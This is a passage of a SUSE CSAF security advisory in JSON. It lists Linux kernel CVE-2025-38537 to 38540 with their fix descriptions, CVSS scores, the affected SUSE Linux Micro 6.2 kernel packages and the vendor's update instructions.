"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38537"
},
{
"cve": "CVE-2025-38538",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38538"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: nbpfaxi: Fix memory corruption in probe()\n\nThe nbpf-\u003echan[] array is allocated earlier in the nbpf_probe() function\nand it has \"num_channels\" elements. These three loops iterate one\nelement farther than they should and corrupt memory.\n\nThe changes to the second loop are more involved. In this case, we\u0027re\ncopying data from the irqbuf[] array into the nbpf-\u003echan[] array. If\nthe data in irqbuf[i] is the error IRQ then we skip it, so the iterators\nare not in sync. I added a check to ensure that we don\u0027t go beyond the\nend of the irqbuf[] array. I\u0027m pretty sure this can\u0027t happen, but it\nseemed harmless to add a check.\n\nOn the other hand, after the loop has ended there is a check to ensure\nthat the \"chan\" iterator is where we expect it to be. In the original\ncode we went one element beyond the end of the array so the iterator\nwasn\u0027t in the correct place and it would always return -EINVAL. However,\nnow it will always be in the correct place. I deleted the check since\nwe know the result.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38538",
"url": "https://www.suse.com/security/cve/CVE-2025-38538"
},
{
"category": "external",
"summary": "SUSE Bug 1248213 for CVE-2025-38538",
"url": "https://bugzilla.suse.com/1248213"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38538"
},
{
"cve": "CVE-2025-38539",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38539"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntracing: Add down_write(trace_event_sem) when adding trace event\n\nWhen a module is loaded, it adds trace events defined by the module. It\nmay also need to modify the modules trace printk formats to replace enum\nnames with their values.\n\nIf two modules are loaded at the same time, the adding of the event to the\nftrace_events list can corrupt the walking of the list in the code that is\nmodifying the printk format strings and crash the kernel.\n\nThe addition of the event should take the trace_event_sem for write while\nit adds the new event.\n\nAlso add a lockdep_assert_held() on that semaphore in\n__trace_add_event_dirs() as it iterates the list.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38539",
"url": "https://www.suse.com/security/cve/CVE-2025-38539"
},
{
"category": "external",
"summary": "SUSE Bug 1248211 for CVE-2025-38539",
"url": "https://bugzilla.suse.com/1248211"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38539"
},
{
"cve": "CVE-2025-38540",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38540"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nHID: quirks: Add quirk for 2 Chicony Electronics HP 5MP Cameras\n\nThe Chicony Electronics HP 5MP Cameras (USB ID 04F2:B824 \u0026 04F2:B82C)\nreport a HID sensor interface that is not actually implemented.\nAttempting to access this non-functional sensor via iio_info causes\nsystem hangs as runtime PM tries to wake up an unresponsive sensor.\n\nAdd these 2 devices to the HID ignore list since the sensor interface is\nnon-functional by design and should not be exposed to userspace.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38540",
"url": "https://www.suse.com/security/cve/CVE-2025-38540"
},
{
"category": "external",
"summary": "SUSE Bug 1248208 for CVE-2025-38540",
"url": "https://bugzilla.suse.com/1248208"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
